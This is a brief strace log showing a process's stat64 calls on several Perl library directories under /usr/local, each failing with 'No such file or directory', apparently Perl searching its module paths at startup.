12579 07:43:07.274425 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfe2e7a0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274437 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfe2e7a0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274452 stat64("/usr/local/lib/perl/5.8.7", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274464 stat64("/usr/local/share/perl/5.8.7", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274476 stat64("/usr/local/lib/perl/5.8.6", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274488 stat64("/usr/local/share/perl/5.8.6", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274499 stat64("/usr/local/lib/perl/5.8.4", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274510 stat64("/usr/local/share/perl/5.8.4", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274522 stat64("/usr/local/lib/perl/5.8.3", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274533 stat64("/usr/local/share/perl/5.8.3", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

12579 07:43:07.274544 stat64("/usr/local/lib/perl/5.8.2", 0xbfe2e8e0) = -1 ENOENT (No such file or directory)

